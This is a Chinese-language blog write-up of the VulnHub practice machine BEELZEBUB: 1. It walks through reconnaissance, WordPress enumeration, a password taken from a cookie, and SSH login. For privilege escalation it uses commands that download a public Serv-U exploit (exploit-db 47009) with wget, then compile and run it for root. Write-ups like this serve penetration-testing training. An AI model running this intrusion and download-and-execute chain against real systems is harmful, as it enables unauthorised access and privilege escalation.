每周打靶练习之BEELZEBUB: 1

最新推荐文章于 2024-07-05 18:01:28 发布
最新推荐文章于 2024-07-05 18:01:28 发布
阅读量342 收藏 6
点赞数 5
分类专栏: 靶机渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chhsbsjs/article/details/136256257
版权

下载压缩包后解压放入VMware里面运行NAT模式

用我们的同网段的kali开始使用arp-csan -l 查看该网卡存活的其他的ip

发现192.168.13.138,接下来使用nmap对该IP经行详细扫描,发现开启22,80端口

我们去访问一下80端口,是一个apache的默认页面

接下来我们对该网站目录进行一个扫描,还是用到我们的dirmap,python dirmap.py -i 192.168.13.138 -lcf,发现有一个phpinfo和phpmyadmin

但是弱口令登录不进去,还有一个login页面进去是404

但是查看源码的时候发现是一个静态网页,404是作者自己写的,还有一个提示信息

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->

说"beelzebub"将md5加密

加密之后是d18e1e22becbd915b45e0e655429d487,然后通过这个值在进行一次目录扫描,发现wordpress目录

接下来用kali的wpscan进行漏洞扫描,wpscan --url=http://192.168.13.138/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force  -e --plugins-detection aggressive

发现有valak和krampus两个用户,接下来检查一下/wp-content/uploads/有无相关文件,发现了一个奇怪的目录:Talk_To_VALAK.

http://192.168.56.244/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/Talk%20To%20VALAK/

发现cookie中有一个passwd:M4k3Ad3a1

然后我们尝试22端口连接,这里只能连接上krampus用户

接下来进行提权,这里sudo命令密码不正确,换其他的提权方式,可以现场看历史命令cat .bash_history

从bash_history可以知道目标运行servU,并且在历史记录中找到了漏洞利用代码的位置:

这里可以看到作者之前应该是进行了漏洞复现的,我们可以直接使用照抄。

wget https://www.exploit-db.com/download/47009

clear

ls

clear

mv 47009 ./exploit.c

gcc exploit.c -o exploit

./exploit

发现成功提权,进入root目录拿到flag

ChefY30
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【VulnHub靶场】——BEELZEBUB: 1
Demo不是emo的博客
09-25 1万+
​ 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题
vlnhub之Beelzebub :1
qwweggfe的博客
09-26 418
0X001 简介 我们在下载靶机时会有这样的提示:您必须尽可能多地枚举并且不要忘记 Base64。说明我们要使用base64,他主要是对Beelzebub进行base64编码,然后可以访问到新的页面,下面是我的一系列操作。 0X002 渗透过程 首先我进行IP扫码,获取靶机的ip地址 我们查看这个ip的端口开启了哪些服务 发现他是使用的apache 2.4.29进行搭建的,于是我打开这个网页 我们看一看他有没有子目录 gobuster dir -r -u http://192..
Vulnhub-BEELZEBUB: 1
Re1_zf的博客
02-01 234
1、目录扫描很重要,尤其是响应码,很有可能有静态页面存储信息的情况,仔细核查200响应码页面2、一串无从下手的字符串可以在目录上尝试一下3、关键页面,尤其是有信息交互的页面,如果没有明显的可利用信息,可以注意一下页面的cookie,有可能就藏着敏感信息,还需要注意,有的时候也需要交互一下再去查看4、phpmyadmin那个估计就是兔子洞了,像OSCP中就需要注意这种兔子洞,会浪费很长时间5、wordpress的神器-wpscan,利用好的话简直无敌。
(Vulnhub靶场)BEELZEBUB: 1 write up
weixin_44588899的博客
05-24 460
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.134 信息搜集 nmap -T4 -p- -A 192.168.220.134 发现开放22、80端口, 打开web页面发现是apache默认页面,直接dirb扫描一下目录 dirb http://192.168.220.134 .
Beelzebub:文件之王-一种业余操作系统
02-03
别西卜 ... 另外,使用GNU Make时,您感兴趣的输出文件是/build/beelzebub.amd64.x86.iso ,使用/build/beelzebub.amd64.x86.iso时是.vmake\amd64.debug\beelzebub.amd64.debug.iso beelzebub.amd64.
“如果我被Beelzebub驱逐出魔鬼,……”:关于网络故障的恶作剧-研究论文
05-19
在经历了关于商业网络优势的第一个欣欣向荣的阶段之后,现在有许多报告证明了它们令人困惑的过度复杂性。 网络故障是多方面的:大量的环境信息,协调封锁,严重的接口问题,永久性决策冲突,不对称的权力关系,节点...
别西卜
02-18
1. **项目目标**:通过阅读`README.md`文件了解项目的目的和使用场景。 2. **项目结构**:理解项目文件的组织方式,包括源码、配置、测试等部分。 3. **核心功能**:分析`main.go`或其他关键文件,找出项目的核心...
右键菜单添加“打开cmd” reg文件
05-12
最近使用cmd比较多,就想在某个文件夹下右键打开cmd,这样不用每次都在默认情况下切换目录。无奈win10 1703版本下shift+右键不能打开cmd,只能...from:https://blog.csdn.net/Mr_BEelzebub/article/details/78776104
AttackGen:一款基于LLM的网络安全事件响应测试工具
FreeBuf_的博客
07-03 1170
1、根据所选的威胁行为组织生成定制化的事件响应场景。2、允许指定组织的规模和行业,以实现定制化方案。3、根据MITRE ATT&CK框架,显示所选威胁行为组织使用的技术详细列表。4、根据选择的ATT&CK技术创建自定义场景。5、使用场景模板根据常见类型的网络事件快速生成自定义场景。6、AttackGen助手,可用于更新或询问有关生成场景的问题聊天界面。7、获取用户对生成场景质量的反馈。8、提供了可下载的Markdown格式场景。
【网络安全】Host碰撞漏洞原理+工具+脚本
等风来
07-05 240
如果其中任何一个组合成功(例如:http://192.168.1.1 with Host: example.com),说明IP地址192.168.1.1存在Host碰撞漏洞,可以通过伪造Host字段访问虚拟主机example.com的资源。如上图,请求www.baidu.com时,服务器通过该字段来确定处理www.baidu.com这个虚拟主机的请求,然后下发资源。如果Web服务器没有正确验证HTTP请求中的Host字段的值,则可以通过伪造或修改Host字段,访问其他虚拟主机上的资源。
2024年中国网络安全市场全景图 -百度下载
qq_18209847的博客
07-04 582
企业数智化转型加速已经促使网络安全成为全社会关注的焦点,在网络安全边界不断扩大,新理念、新产品、新技术不断融合发展的进程中,数说安全始终秉承科学的方法论,以遵循市场发展的内在规律为原则、以尊重用户实际的采购习惯为基础、以遵守行业主管部门的权威要求为前提,以着眼产业未来的发展方向为目标,紧密跟踪网络安全市场与技术的最新动态,持续更新市场分类方法,目前已形成一套符合我国网络安全行业真实供需关系的市场分类架构。:网络与基础架构安全、端点安全、身份与访问管理、应用安全、数据安全、开发安全安全管理;
印尼网络安全治理能力观察
网络研究观
07-05 1077
这不是第一次,而且很可能也不会是最后一次。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1030
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
记一次漏洞挖掘【网络安全
wlaq_juju的博客
07-05 1045
从CVE-2019-10999查看该CVE的基础信息得知,这是一个栈溢出漏洞,攻击者在已登录的情况下可以通过向wireless.htm发送一个超长的WEPEncryption参数导致栈溢出,从而执行任意命令攻击. 现在我们利用Shambles Desktop工具确定这个漏洞的位置并且执行一次栈溢出攻击。从Dlink官网查看存在这个漏洞的设备和版本信息。我们选择DCS-932L的v2.17.01版本。下载对应固件。
人工智能对网络安全有何影响?
网络研究观
07-05 1104
随着网络安全行业的不断发展,人工智能显然将成为防御和进攻策略的驱动力。
Cybervadis认证是什么?
bjpengsheng的博客
07-02 919
自我评估阶段:按照Cybervadis的评估标准和方法,对组织进行自我评估,收集和分析数据,评估组织的网络安全性和风险管理水平,并找出需要改进的领域。同时准备自我评估报告。综上所述,Cybervadis认证通过全面评估组织的网络安全实践、发现潜在风险、提供改进建议和最佳实践以及促进持续改进和学习等方式,为组织带来了显著的优势和好处。综上所述,Cybervadis认证是一种全面的网络安全评估和认证服务,它可以帮助组织提高网络安全实践的成熟度,并通过获得认证来展示其在网络安全方面的能力和承诺。
网络安全筑基篇——反序列化漏洞
weixin_55762309的博客
06-27 1085
反序列化漏洞原理详解
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
最新发布
07-08
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值